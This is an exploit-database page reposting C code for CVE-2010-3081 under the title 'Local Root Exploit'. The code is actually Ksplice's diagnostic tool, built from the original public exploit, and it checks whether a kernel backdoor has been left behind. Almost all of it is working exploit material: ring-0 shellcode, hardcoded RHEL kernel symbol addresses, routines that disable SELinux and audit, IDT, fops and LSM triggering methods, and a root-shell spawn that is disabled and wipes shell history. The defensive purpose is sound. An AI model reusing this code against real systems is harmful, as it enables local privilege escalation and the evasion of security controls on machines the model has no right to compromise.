Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
zdtHackeri-AL1337DAY-ID-14333
HistoryOct 04, 2010 - 12:00 a.m.

kernel-2.6.18-164 2010 Local Root Exploit

2010-10-0400:00:00
Hackeri-AL
0day.today
48
JSON

Exploit for linux platform in category local exploits

=========================================
kernel-2.6.18-164 2010 Local Root Exploit
=========================================

# Author: Hackeri-AL
# Email : h-al [at] hotmail [dot] it
# Group : UAH / United ALBANIA Hackers
# Web   : uah1.org.uk
# Greetz: LoocK3D - b4cKd00r ~

--------------------------------------------

/*

Diagnostic test for CVE-2010-3081 public exploit

Greg Price, Ksplice, Inc.

Tests whether the system has previously been exposed to the exploit
published as "hackerial.c" by Hackeri-AL on 2010 Sep 15.  Based on the
original exploit code.

For more information, see
  http://www.ksplice.com/uptrack/cve-2010-3081

*/

#include <poll.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <stdlib.h>
#include <sys/wait.h>
#include <sys/utsname.h>
#include <sys/socket.h>
#include <sched.h>
#include <netinet/in.h>
#include <stdio.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sys/mman.h>
#include <sys/ipc.h> 
#include <sys/msg.h>
#include <sys/resource.h>
#include <errno.h>


#define _GNU_SOURCE
#define __dgdhdytrg55 unsigned int
#define __yyrhdgdtfs66ytgetrfd unsigned long long
#define __dhdyetgdfstreg__ memcpy

#define BANNER "Diagnostic tool for public CVE-2010-3081 exploit -- Ksplice, Inc.\n" \
               "(see http://www.ksplice.com/uptrack/cve-2010-3081)\n" \
               "\n"

#define KALLSYMS              "/proc/kallsyms"
#define TMAGIC_66TDFDRTS      "/proc/timer_list"
#define SELINUX_PATH          "/selinux/enforce"
#define RW_FOPS               "timer_list_fops"
#define PER_C_DHHDYDGTREM7765 "per_cpu__current_task"
#define PREPARE_GGDTSGFSRFSD  "prepare_creds"
#define OVERRIDE_GGDTSGFSRFSD "override_creds"
#define REVERT_DHDGTRRTEFDTD  "revert_creds"
#define Y0Y0SMAP              0x100000UL
#define Y0Y0CMAP              0x200000UL
#define Y0Y0STOP              (Y0Y0SMAP+0xFFC)
#define J0J0S                 0x00200000UL
#define J0J0R00T              0x002000F0UL
#define PAGE_SIZE             0x1000

#define KERN_DHHDYTMLADSFPYT     0x1
#define KERN_DGGDYDTEGGETFDRLAK  0x2
#define KERN_HHSYPPLORQTWGFD     0x4 


#define KERN_DIS_GGDYYTDFFACVFD_IDT      0x8
#define KERN_DIS_DGDGHHYTTFSR34353_FOPS     0x10
#define KERN_DIS_GGDHHDYQEEWR4432PPOI_LSM      0x20

#define KERN_DIS_GGSTEYGDTREFRET_SEL1NUX  0x40

#define isRHHGDPPLADSF(ver) (strstr(ver, ".el4") || strstr(ver,".el5"))

#define __gggdfstsgdt_dddex(f, a...) do { fprintf(stdout, f, ## a); } while(0)
#define __pppp_tegddewyfg(s) do { fprintf(stdout, "%s", s); } while(0)
/* #define __print_verbose(s) do { fprintf(stdout, "%s", s); } while(0) */
#define __print_verbose(s) do { } while (0)
#define __xxxfdgftr_hshsgdt(s) do { perror(s); exit(-1); } while(0)
#define __yyy_tegdtfsrer(s) do { fprintf(stderr, s); exit(-1); } while(0)

static char buffer[1024];
static int s;
static int flags=0;
volatile static socklen_t magiclen=0;
static int useidt=1, usefops=0, uselsm=0;
static __yyrhdgdtfs66ytgetrfd _m_fops=0,_m_cred[3] = {0,0,0};
static __dgdhdytrg55 _m_cpu_off=0;
static char krelease[64];
static char kversion[128];

#define R0C_0FF 14
static char ttrg0ccc[]=
"\x51\x57\x53\x56\x48\x31\xc9\x48\x89\xf8\x48\x31\xf6\xbe\x41\x41\x41\x41"  
"\x3b\x30\x75\x1f\x3b\x70\x04\x75\x1a\x3b\x70\x08\x75\x15\x3b\x70\x0c"   
"\x75\x10\x48\x31\xdb\x89\x18\x89\x58\x04\x89\x58\x08\x89\x58\x0c\xeb\x11"     
"\x48\xff\xc0\x48\xff\xc1\x48\x81\xf9\x4c\x04\x00\x00\x74\x02"                   
"\xeb\xcc\x5e\x5b\x5f\x59\xc3";               


#define R0YTTTTUHLFSTT_OFF1 5
#define R0YGGSFDARTDF_DHDYTEGRDFD_D 21
#define R0TDGFSRSLLSJ_SHSYSTGD 45
char r1ngrrrrrrr[]=
"\x53\x52\x57\x48\xbb\x41\x41\x41\x41\x41\x41\x41\x41\xff\xd3"                                 
"\x50\x48\x89\xc7\x48\xbb\x42\x42\x42\x42\x42\x42\x42\x42"  
"\xff\xd3\x48\x31\xd2\x89\x50\x04\x89\x50\x14\x48\x89\xc7"                              
"\x48\xbb\x43\x43\x43\x43\x43\x43\x43\x43"   
"\xff\xd3\x5f\x5f\x5a\x5b\xc3";                                       


#define RJMPDDTGR_OFF 13
#define RJMPDDTGR_DHDYTGSCAVSF 7
#define RJMPDDTGR_GDTDGTSFRDFT 25
static char ttrfd0[]=
"\x57\x50\x65\x48\x8b\x3c\x25\x00\x00\x00\x00"
"\x48\xb8\x41\x41\x41\x41\x41\x41\x41\x41\xff\xd0"                      
"\x58\x5f"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\xc3";


/* implement selinux bypass for IDT ! */
#define RJMPDDTGR_OFF_IDT 14
#define RJMPDDTGR_DYHHTSFDARE 8
#define RJMPDDTGR_DHDYSGTSFDRTAC_SE 27
static char ruujhdbgatrfe345[]=
"\x0f\x01\xf8\x65\x48\x8b\x3c\x25\x00\x00\x00\x00"      
"\x48\xb8\x41\x41\x41\x41\x41\x41\x41\x41\xff\xd0"                                  
"\x0f\x01\xf8"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x48\xcf";  



#define CJE_4554TFFDTRMAJHD_OFF  10
#define RJMPDDTGR_AYYYDGTREFCCV7761_OF      23
static char dis4blens4sel1nuxhayettgdr64545[]=
"\x41\x52\x50"
"\xb8\x00\x00\x00\x00"
"\x49\xba\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x89\x02"
"\x49\xba\x42\x42\x42\x42\x42\x42\x42\x42"
"\x41\x89\x02"
"\x58\x41\x5a";           




/* rhel LSM stuffs */
#define RHEL_LSM_OFF 98

struct LSM_rhel 
{ 
  __yyrhdgdtfs66ytgetrfd selinux_ops;
  __yyrhdgdtfs66ytgetrfd capability_ops;
  __yyrhdgdtfs66ytgetrfd dummy_security_ops;

  __yyrhdgdtfs66ytgetrfd selinux_enforcing;
  __yyrhdgdtfs66ytgetrfd audit_enabled;

  const char *krelease; 
  const char *kversion;
 
};

struct LSM_rhel known_targets[4]=
{
  {
    0xffffffff8031e600ULL,
    0xffffffff8031fec0ULL,
    0xffffffff804acc00ULL,

    0xffffffff804af960ULL,
    0xffffffff8049b124ULL,

    "2.6.18-164.el5",
    "#1 SMP Thu Sep 3 03:28:30 EDT 2009"  // to manage minor/bug fix changes
  },
  {
   0xffffffff8031f600ULL,
   0xffffffff80320ec0ULL,
   0xffffffff804afc00ULL,

   0xffffffff804b2960ULL,
   0xffffffff8049e124ULL,

   "2.6.18-164.11.1.el5",
   "#1 SMP Wed Jan 6 13:26:04 EST 2010"
  },
  {
    0xffffffff805296a0ULL,
    0xffffffff8052af60ULL,
    0xffffffff806db1e0ULL,

    0xffffffff806ddf40ULL,
    0xffffffff806d5324ULL,

    "2.6.18-164.11.1.el5xen",
    "#1 SMP Wed Jan 20 08:06:04 EST 2010"   // default xen
  },
  {
    0xffffffff8031f600ULL,// d selinux_ops
    0xffffffff80320ec0ULL,// d capability_ops
    0xffffffff804afc00ULL,// B dummy_security_ops

    0xffffffff804b2960ULL,// B selinux_enforcing
    0xffffffff8049e124ULL,// B audit_enabled

    "2.6.18-164.11.1.el5",
    "#1 SMP Wed Jan 20 07:32:21 EST 2010" // tripwire target LoL
   }

};

static struct LSM_rhel *curr_target=NULL, dyn4nt4n1labeggeyrthryt;

static int isSelinuxEnabled()
{
  FILE *selinux_f;
  selinux_f = fopen(SELINUX_PATH, "r");
  if(selinux_f == NULL)
  {
    if(errno == EPERM)
      return 1;
    else 
     return 0;
  }

  fclose(selinux_f);
  return 1;
}

static int wtfyourunhere_heee(char *out_release, char* out_version)
{
 int ret; const char*ptr;
 int count=0;
 char r[32], *bptr;
 struct utsname buf;
 ret =  uname(&buf);

 if(ret < 0)
   return -1; 
 
 strcpy(out_release, buf.release);
 strcpy(out_version, buf.version);

 ptr = buf.release;
 bptr = r;
 memset(r, 0x00, sizeof(r)); 
 while(*ptr)
 {
   if(count == 2)
    {
      if(*ptr >= '0' && *ptr <= '9')
        *bptr++ = *ptr;
      else
        break;
    }
 
   if(*ptr == '.')
     count++;
   ptr++;
 }

 if(strlen(r) < 1 || !atoi(r))
   return -1; 

 return atoi(r); 
}


static void p4tch_sel1nux_codztegfaddczda(struct LSM_rhel *table)
{
  *((__yyrhdgdtfs66ytgetrfd *)(dis4blens4sel1nuxhayettgdr64545 + CJE_4554TFFDTRMAJHD_OFF)) = table->selinux_enforcing;
  *((__yyrhdgdtfs66ytgetrfd *)(dis4blens4sel1nuxhayettgdr64545 + RJMPDDTGR_AYYYDGTREFCCV7761_OF)) = table->audit_enabled;
  __dhdyetgdfstreg__(ttrfd0 + RJMPDDTGR_GDTDGTSFRDFT, dis4blens4sel1nuxhayettgdr64545, sizeof(dis4blens4sel1nuxhayettgdr64545)-1); 
  __dhdyetgdfstreg__(ruujhdbgatrfe345 + RJMPDDTGR_DHDYSGTSFDRTAC_SE, dis4blens4sel1nuxhayettgdr64545, sizeof(dis4blens4sel1nuxhayettgdr64545)-1); 
}


static __yyrhdgdtfs66ytgetrfd get_sym_ex(const char* s, const char* filename, int ignore_flag)
{
  FILE *ka;
  char line[512];
  char reloc_a[64];
  char reloc[64];

  if(!(flags & KERN_HHSYPPLORQTWGFD) && !ignore_flag)
    return 0;
  
  ka = fopen(filename, "r");
  if(!ka)
    return 0;

  while(fgets(line, 512, ka) != NULL)
  {
    char *l_p  = line;
    char *ra_p = reloc_a;
    char *r_p    = reloc;
    memset(reloc, 0x00, sizeof(reloc));
    memset(reloc_a, 0x00, sizeof(reloc_a));
    while(*l_p != ' ' && (ra_p - reloc_a)  < 64)
      *ra_p++ = *l_p++;  
    l_p += 3;
    while(*l_p != ' ' && *l_p != '\n' && *l_p != '\t' && (r_p - reloc) < 64)
      *r_p++ = *l_p++;

    if(!strcmp(reloc, s))
    {
      return strtoull(reloc_a, NULL, 16); 
    }
  }

  return 0; 
}


static inline __yyrhdgdtfs66ytgetrfd get_sym(const char* s)
{
  return get_sym_ex(s, KALLSYMS, 0);
}

static int parse_cred(const char* val)
{
  int i=0;
  const char* p = val;
  char local[64], *l;
  for(i=0; i<3; i++)  
  {
    memset(local, 0x00, sizeof(local));
    l = local;
    while(*p && *p != ',')
      *l++ = *p++;

    if(!(*p) && i != 2)
      return -1;

    _m_cred[i] = strtoull(local, NULL, 16);
    p++;
  }
 
  return 0; 
}


#define SELINUX_OPS        "selinux_ops"
#define DUMMY_SECURITY_OPS "dummy_security_ops"
#define CAPABILITY_OPS     "capability_ops"
#define SELINUX_ENFORCING  "selinux_enforcing"
#define AUDIT_ENABLED      "audit_enabled"

struct LSM_rhel *lsm_rhel_find_target(int check_rhel)
{
   int i;
   char mapbuf[128];
   struct LSM_rhel *lsm = &(known_targets[0]);

   if(check_rhel && !isRHHGDPPLADSF(krelease))
   {
     __pppp_tegddewyfg("!!! Not a RHEL kernel, will skip LSM method \n");
     return NULL;
   }

   __print_verbose("$$$ Looking for known RHEL kernels.. \n");
   for(i=0; i<sizeof(known_targets)/sizeof(struct LSM_rhel); i++, lsm++)
   {
     if(!strcmp(krelease, lsm->krelease) && !strcmp(kversion, lsm->kversion))
     {
       __gggdfstsgdt_dddex("$$$ Known target kernel: %s %s \n", lsm->krelease, lsm->kversion);
       return lsm;
     }
   }

   __print_verbose("$$$ Locating symbols for new target...\n");
   strcpy(mapbuf, "/boot/System.map-");
   strcat(mapbuf, krelease);

   dyn4nt4n1labeggeyrthryt.selinux_ops        = get_sym_ex(SELINUX_OPS, mapbuf, 1);
   dyn4nt4n1labeggeyrthryt.dummy_security_ops = get_sym_ex(DUMMY_SECURITY_OPS, mapbuf, 1);
   dyn4nt4n1labeggeyrthryt.capability_ops     = get_sym_ex(CAPABILITY_OPS, mapbuf, 1);
   dyn4nt4n1labeggeyrthryt.selinux_enforcing  = get_sym_ex(SELINUX_ENFORCING, mapbuf, 1);
   dyn4nt4n1labeggeyrthryt.audit_enabled      = get_sym_ex(AUDIT_ENABLED, mapbuf, 1);


   if(!dyn4nt4n1labeggeyrthryt.selinux_ops ||
      !dyn4nt4n1labeggeyrthryt.dummy_security_ops ||
      !dyn4nt4n1labeggeyrthryt.capability_ops ||
      !dyn4nt4n1labeggeyrthryt.selinux_enforcing ||
      !dyn4nt4n1labeggeyrthryt.audit_enabled)
	return NULL;


   return &dyn4nt4n1labeggeyrthryt;
}

void error_no_symbol(const char *symbol)
{
  fprintf(stderr,
          "!!! Could not find symbol: %s\n"
          "\n"
          "A symbol required by the published exploit for CVE-2010-3081 is not\n"
          "provided by your kernel.  The exploit would not work on your system.\n",
          symbol);
  exit(-1);
}

static void put_your_hands_up_hooker(int argc, char *argv[])
{
  int fd,ver,ret;
  char __b[16];


  fd = open(KALLSYMS, O_RDONLY);
  ret = read(fd, __b, 16); // dummy read
  if((fd >= 0 && ret > 0))
  {
    __print_verbose("$$$ can read /proc/kallsyms, will use for convenience\n"); // d0nt p4tch m3 br0
    flags |= KERN_HHSYPPLORQTWGFD;
  }
  close(fd);

  ver = wtfyourunhere_heee(krelease, kversion);
  if(ver < 0)
    __yyy_tegdtfsrer("!!! uname failed\n");

  __gggdfstsgdt_dddex("$$$ Kernel release: %s\n", krelease);


  if(argc != 1)
  {
    while( (ret = getopt(argc, argv, "sflc:k:o:")) > 0)
    {
      switch(ret)
      {
        case 'f':
          flags |= KERN_DIS_GGDHHDYQEEWR4432PPOI_LSM|KERN_DIS_GGDYYTDFFACVFD_IDT;
          break;
	
	case 'l':
	  flags |= KERN_DIS_GGDYYTDFFACVFD_IDT|KERN_DIS_DGDGHHYTTFSR34353_FOPS;
	  break;

        case 'c':
          if(!optarg || parse_cred(optarg) < 0)
              __yyy_tegdtfsrer("!!! Unable to parse cred codes\n");
          break;

        case 'k':
          if(optarg)
            _m_fops = strtoull(optarg, NULL, 16);
          else
	     __yyy_tegdtfsrer("!!! Unable to parse fops numbers\n");
          break;

        case 's':
          if(!isSelinuxEnabled())
            __pppp_tegddewyfg("??? -s ignored: SELinux not enabled\n");
          else
            flags |= KERN_DIS_GGSTEYGDTREFRET_SEL1NUX;
          break;
            
        case 'o':
          if(optarg)
            _m_cpu_off = strtoull(optarg, NULL, 16);
	  else
	    __yyy_tegdtfsrer("!!! Unable to parse cpu_off numbers\n");
          break;
      }
    }
  }


  if(ver >= 29) // needs cred structure 
  {
    flags |= KERN_DGGDYDTEGGETFDRLAK;
  
    if(!_m_cred[0] || !_m_cred[1] || !_m_cred[2])
    {
      _m_cred[0] = get_sym(PREPARE_GGDTSGFSRFSD);
      _m_cred[1] = get_sym(OVERRIDE_GGDTSGFSRFSD); 
      _m_cred[2] = get_sym(REVERT_DHDGTRRTEFDTD);
    }

    if(!_m_cred[0])
      error_no_symbol("prepare_creds");
    if(!_m_cred[1])
      error_no_symbol("override_creds");
    if(!_m_cred[2])
      error_no_symbol("revert_creds");
    
    __print_verbose("$$$ Kernel credentials detected\n");
    *((__yyrhdgdtfs66ytgetrfd *)(r1ngrrrrrrr + R0YTTTTUHLFSTT_OFF1)) = _m_cred[0];
    *((__yyrhdgdtfs66ytgetrfd *)(r1ngrrrrrrr + R0YGGSFDARTDF_DHDYTEGRDFD_D)) = _m_cred[1];
    *((__yyrhdgdtfs66ytgetrfd *)(r1ngrrrrrrr + R0TDGFSRSLLSJ_SHSYSTGD)) = _m_cred[2];
  }

  if(ver >= 30)  // needs cpu offset
  {
    flags |= KERN_DHHDYTMLADSFPYT;
    if(!_m_cpu_off)
    _m_cpu_off = (__dgdhdytrg55)get_sym(PER_C_DHHDYDGTREM7765);

    if(!_m_cpu_off)
      error_no_symbol("per_cpu__current_task");

    __print_verbose("$$$ Kernel per_cpu relocs enabled\n");
    *((__dgdhdytrg55 *)(ttrfd0 + RJMPDDTGR_DHDYTGSCAVSF)) = _m_cpu_off;
    *((__dgdhdytrg55 *)(ruujhdbgatrfe345 + RJMPDDTGR_DYHHTSFDARE)) = _m_cpu_off;
  }
}


static void env_prepare(int argc, char* argv[])
{

  put_your_hands_up_hooker(argc, argv);

  if(!(flags & KERN_DIS_DGDGHHYTTFSR34353_FOPS))  // try fops
  {
    __print_verbose("??? Trying the timer_list_fops method\n");
    if(!_m_fops)
      _m_fops = get_sym(RW_FOPS);

    /* TODO: do RW check for newer -mm kernels which has timer_list_struct RO
     * Thanks to the guy who killed this vector... you know who you are:)
     * Lucky for you, there are more:) 
     */

    if(_m_fops) 
    {
      usefops=1;
    }
  }


  if(!(flags & KERN_DIS_GGDHHDYQEEWR4432PPOI_LSM)) // try lsm(rhel)
  {
    __print_verbose("??? Trying the LSM method\n");
    curr_target = lsm_rhel_find_target(1);
    if(!curr_target)
    {
       __print_verbose("!!! Unable to find target for LSM method\n"); 
    }
    else {
      uselsm=1;
    }
  }

 
  if(useidt && (flags & KERN_DIS_GGSTEYGDTREFRET_SEL1NUX))
  {
    // -i flag
    curr_target = lsm_rhel_find_target(0);
    if(!curr_target)
    {
       __pppp_tegddewyfg("!!! Unable to find target: continue without SELinux disabled\n");
       /* remove Selinux Flag */
       flags &= ~KERN_DIS_GGSTEYGDTREFRET_SEL1NUX;
    }
  }


  if(!usefops && !useidt && !uselsm)
    __yyy_tegdtfsrer("!!! All exploit methods failed.\n");  
}


static inline int get_socklen(__yyrhdgdtfs66ytgetrfd addr, __dgdhdytrg55 stack)
{
  int socklen_l = 8 + stack - addr - 16;
  return socklen_l;
}


static void __setmcbuffer(__dgdhdytrg55 value)
{
  int i;
  __dgdhdytrg55 *p = (__dgdhdytrg55*)buffer;
  for(i=0; i<sizeof(buffer)/sizeof(void*); i++)
    *(p+i) = value;
}


static void y0y0stack()
{
  void* map = mmap((void*)Y0Y0SMAP, 
                   PAGE_SIZE, 
                   PROT_READ|PROT_WRITE, 
                   MAP_ANONYMOUS|MAP_PRIVATE|MAP_FIXED, 
                   -1,0);
  if(MAP_FAILED == map)
    __xxxfdgftr_hshsgdt("mmap"); 
}

static void y0y0code()
{
  void* map = mmap((void*)Y0Y0CMAP, 
                   PAGE_SIZE, 

#ifdef TRY_REMAP_DEFAULT 
		   PROT_READ|PROT_WRITE,
#else
                   PROT_READ|PROT_WRITE|PROT_EXEC, 
#endif
                   MAP_ANONYMOUS|MAP_PRIVATE|MAP_FIXED, 
                   -1,0);
  if(MAP_FAILED == map)
    __xxxfdgftr_hshsgdt("mmap"); 

}


static int rey0y0code(unsigned long old)
{
  int fd;
  void *map;
  volatile char wizard;
  char cwd[1024];

  getcwd(cwd, sizeof(cwd));  
  strcat(cwd, "/__tmpfile");
 
  unlink(cwd);
  fd = open(cwd, O_RDWR|O_CREAT, S_IRWXU);
  if(fd < 0)
    return -1; 

  write(fd, (const void*)old, PAGE_SIZE); 
  if(munmap((void*)old, PAGE_SIZE) < 0)
    return -1;

  map = mmap((void*)old, 
                   PAGE_SIZE, 
                   PROT_READ|PROT_EXEC, 
                   MAP_PRIVATE|MAP_FIXED, 
                   fd,0);
  if(map == MAP_FAILED)
    return -1; 
 
  /* avoid lazy page fault handler 
   * Triple Fault when using idt vector 
   * and no pages are already mapped:)
   */

  wizard = *((char*)old);
  unlink(cwd);
  return wizard; 
}

void finish_shellcode()
{ 
  /* set shellcode level 2 */
  if(flags & KERN_DGGDYDTEGGETFDRLAK)
  {
    __print_verbose("$$$ Using cred shellcode\n");
    __dhdyetgdfstreg__((void*)J0J0R00T, r1ngrrrrrrr, sizeof(r1ngrrrrrrr));
  }
  else
  {
    __print_verbose("$$$ Using standard shellcode\n");
    __dhdyetgdfstreg__((void*)J0J0R00T,  ttrg0ccc, sizeof(ttrg0ccc));
    *((unsigned int*)(J0J0R00T + R0C_0FF)) = getuid();
  }

#ifdef TRY_REMAP_DEFAULT
  if(rey0y0code(Y0Y0CMAP) < 0)
    __yyy_tegdtfsrer("!!! Unable to remap\n");
#endif
}

int method_idt_main()
{
  __yyrhdgdtfs66ytgetrfd *patch;

  __print_verbose("$$$ Building shellcode - IDT method\n");   
  patch = (__yyrhdgdtfs66ytgetrfd*)(ruujhdbgatrfe345 + RJMPDDTGR_OFF_IDT);
  *patch = (__yyrhdgdtfs66ytgetrfd)(J0J0R00T);

  if(flags & KERN_DIS_GGSTEYGDTREFRET_SEL1NUX)
  {
    __print_verbose("$$$ including code to disable SELinux\n");
    p4tch_sel1nux_codztegfaddczda(curr_target);
  }
    
  __dhdyetgdfstreg__((void*)J0J0S,  ruujhdbgatrfe345, sizeof(ruujhdbgatrfe345));

  finish_shellcode();

  asm volatile("int $0xdd\t\n");

  return (getuid() == 0);
}

int method_idt()
{
  /* method_idt_main() crashes if no backdoor is present, so protect ourselves */
  int pid;

  pid = fork();
  if (pid < 0) {
    __xxxfdgftr_hshsgdt("!!! fork() failed");
    return 0; // error
  }

  if (pid == 0) {
    int r;
    struct rlimit rlim = {0, 0};
    setrlimit(RLIMIT_CORE, &rlim);
    r = method_idt_main();
    exit(r ? 0 : 1);
  }

  int status;
  waitpid(pid, &status, 0);
  if (status == 0)
    return method_idt_main();
  else
    return 0;
}

void prepare_fops_lsm_shellcode()
{
  __yyrhdgdtfs66ytgetrfd *patch;

  __print_verbose("$$$ Building shellcode - fops/LSM method\n");   
  patch = (__yyrhdgdtfs66ytgetrfd*)(ttrfd0 + RJMPDDTGR_OFF);
  *patch = (__yyrhdgdtfs66ytgetrfd)(J0J0R00T);

  __setmcbuffer(J0J0S);

  if(uselsm && (flags & KERN_DIS_GGSTEYGDTREFRET_SEL1NUX))
  {
      __print_verbose("$$$ including code to disable SELinux\n");
      p4tch_sel1nux_codztegfaddczda(curr_target);
  } 
  __dhdyetgdfstreg__((void*)J0J0S, ttrfd0, sizeof(ttrfd0));

  finish_shellcode();
}

int method_fops()
{
  int fd;
  struct pollfd pfd;

  prepare_fops_lsm_shellcode();

  fd = open(TMAGIC_66TDFDRTS, O_RDONLY);
  if(fd < 0)
    __xxxfdgftr_hshsgdt("!!! could not open /proc/timer_list");
  
  pfd.fd = fd;
  pfd.events = POLLIN | POLLOUT;
  poll(&pfd, 1, 0);

  return (getuid() == 0);
}

int method_lsm()
{
  int msqid;
  prepare_fops_lsm_shellcode();

  msqid = msgget(0, IPC_PRIVATE|0600);
  if(msqid < 0)
    __xxxfdgftr_hshsgdt("!!! msgget() failed");

  msgctl(msqid, IPC_RMID, (struct msqid_ds *) NULL); // exploit it

  return (getuid() == 0);
}

int main(int argc, char*argv[])
{
  int done;
  printf(BANNER);

  if (getuid() == 0) {
    fprintf(stderr, "!!! Must run as non-root.\n");
    return 1;
  }

  env_prepare(argc, argv);

  y0y0stack(); 
  y0y0code();

  done = 0;

  __pppp_tegddewyfg("$$$ Backdoor in LSM (1/3): ");
  if (uselsm) {
    __pppp_tegddewyfg("checking...");
    done = method_lsm();
    if (done)
      __pppp_tegddewyfg("PRESENT\n");
    else
      __pppp_tegddewyfg("not present.\n");
  } else {
    __pppp_tegddewyfg("not available.\n");
  }

  if (!done) {
    __pppp_tegddewyfg("$$$ Backdoor in timer_list_fops (2/3): ");
    if (usefops) {
      __pppp_tegddewyfg("checking...");
      done = method_fops();
      if (done)
        __pppp_tegddewyfg("PRESENT\n");
      else
        __pppp_tegddewyfg("not present.\n");
    } else {
      __pppp_tegddewyfg("not available.\n");
    }
  }

  if (!done) {
    __pppp_tegddewyfg("$$$ Backdoor in IDT (3/3): ");
    if (useidt) {
      __pppp_tegddewyfg("checking...");
      fflush(stdout);
      done = method_idt();
      if (done)
        __pppp_tegddewyfg("PRESENT\n");
      else
        __pppp_tegddewyfg("not present.\n");
    } else {
      __pppp_tegddewyfg("NOT CHECKING\n");
    }
  }

  munmap((void*)Y0Y0CMAP, PAGE_SIZE);

  /* exec */
  if(getuid() == 0)
  {
    pid_t pid;
    printf("\n"
           "Your in-memory kernel HAS A BACKDOOR that may have been left\n"
           "by the published exploit for CVE-2010-3081.\n"
           "\n"
           "More information is available at\n"
           "  http://www.ksplice.com/uptrack/cve-2010-3081\n"
           );
    if (0) {
      /* spawn root shell as demonstration */
      pid = fork();
      if(pid == 0)
      {
        char *args[] = {"/bin/sh", "-i", NULL};
        char *envp[] = {"TERM=linux", "BASH_HISTORY=/dev/null", "HISTORY=/dev/null", "history=/dev/null", "HISTFILE=/dev/null", "HISTFILESIZE=0",
                        "PATH=/bin:/sbin:/usr/sbin:/usr/bin:/usr/local/bin:/usr/local/sbin", NULL };
        execve("/bin/sh", args, envp);
      } 
      else  
      {
        int status;
        waitpid(pid, &status, 0);
      }
    }
  }
  else {
    printf("\n"
           "Your system is free from the backdoors that would be left in memory\n"
           "by the published exploit for CVE-2010-3081.\n");
  }

  close(s);
  return 0;
}



#  0day.today [2018-01-09]  #

Related

openvas 50
centos 2
nessus 36
oraclelinux 7
vmware 2
redhat 8
cvelist 1
prion 1
exploitdb 1
ubuntucve 1
veracode 1
cve 1
nvd 1
zdt 1
ubuntu 4
slackware 1
suse 8
debian 1
securityvulns 2
osv 1
fedora 8
kitploit 1
openvas
openvas
CentOS Update for kernel CESA-2010:0718 centos4 i386
2010-10-01 00:00:00
CentOS Update for kernel CESA-2010:0704 centos5 i386
2011-08-09 00:00:00
CentOS Update for kernel CESA-2010:0704 centos5 i386
2011-08-09 00:00:00
centos
centos
kernel security update
2010-09-21 16:08:22
kernel security update
2010-09-29 09:53:01
nessus
nessus
CentOS 4 : kernel (CESA-2010:0718)
2010-10-06 00:00:00
RHEL 4 : kernel (RHSA-2010:0718)
2010-10-06 00:00:00
Scientific Linux Security Update : kernel on SL5.x i386/x86_64
2012-08-01 00:00:00
oraclelinux
oraclelinux
kernel security update
2010-09-21 00:00:00
kernel security update
2010-09-28 00:00:00
kernel security and bug fix update
2010-10-20 00:00:00
vmware
vmware
VMware ESX third party update for Service Console kernel
2010-11-29 00:00:00
VMware ESX third party update for Service Console kernel
2010-11-29 00:00:00
redhat
redhat
(RHSA-2010:0705) Important: kernel security update
2010-09-21 00:00:00
(RHSA-2010:0718) Important: kernel security update
2010-09-28 00:00:00
(RHSA-2010:0711) Important: kernel security update
2010-09-22 00:00:00
cvelist
cvelist
CVE-2010-3081
2010-09-24 19:00:00
prion
prion
Null pointer dereference
2010-09-24 20:00:00
exploitdb
exploitdb
Linux Kernel 2.6.27 &lt; 2.6.36 (RedHat x86-64) - &#039;compat&#039; Local Privilege Escalation
2010-09-16 00:00:00
ubuntucve
ubuntucve
CVE-2010-3081
2010-09-15 00:00:00
veracode
veracode
Privilege Escalation
2020-04-10 00:47:57
cve
cve
CVE-2010-3081
2010-09-24 20:00:02
nvd
nvd
CVE-2010-3081
2010-09-24 20:00:02
zdt
zdt
kernel-2.6.18.194 */*e15 */* 2010 Local Root Exploit
2010-12-06 00:00:00
ubuntu
ubuntu
Linux kernel vulnerabilities
2010-09-17 00:00:00
Linux kernel (OMAP4) vulnerabilities
2011-04-20 00:00:00
Linux kernel vulnerabilities
2011-02-28 00:00:00
slackware
slackware
[slackware-security] 64-bit kernel
2010-09-22 20:27:24
suse
suse
local privilege escalation in kernel
2010-09-23 16:30:19
local privilege escalation in kernel
2010-09-23 16:33:25
local privilege escalation in kernel
2010-09-23 16:31:13
debian
debian
[SECURITY] [DSA 2110-1] New Linux 2.6.26 packages fix several issues
2010-09-17 15:45:07
securityvulns
securityvulns
[SECURITY] [DSA 2110-1] New Linux 2.6.26 packages fix several issues
2010-09-20 00:00:00
Linux kernel multiple security vulnerabilities
2010-09-20 00:00:00
osv
osv
linux-2.6 - several issues
2010-09-17 00:00:00
fedora
fedora
[SECURITY] Fedora 14 Update: kernel-2.6.35.4-28.fc14
2010-09-22 04:10:26
[SECURITY] Fedora 13 Update: kernel-2.6.34.7-56.fc13
2010-09-21 01:30:38
[SECURITY] Fedora 12 Update: kernel-2.6.32.21-168.fc12
2010-09-21 01:38:22
kitploit
kitploit
[Linux Exploit Suggester] Grab the Linux Operating Systems release version, and return a suggestive list of possible exploits
2013-08-29 00:48:00
JSON
Related for 1337DAY-ID-14333
openvas50centos2nessus36oraclelinux7vmware2redhat8cvelist1prion1exploitdb1ubuntucve1veracode1cve1nvd1zdt1ubuntu4slackware1suse8debian1securityvulns2osv1fedora8kitploit1